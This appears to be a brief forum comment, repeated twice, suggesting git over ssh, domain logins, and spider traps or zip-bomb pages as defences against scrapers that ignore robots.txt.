Some run git over ssh, and a domain login for https:// permission manager etc.
Also, spider traps and 42TB zip of death pages work well on poorly written scrapers that ignored robots.txt =3
Some run git over ssh, and a domain login for https:// permission manager etc.
Also, spider traps and 42TB zip of death pages work well on poorly written scrapers that ignored robots.txt =3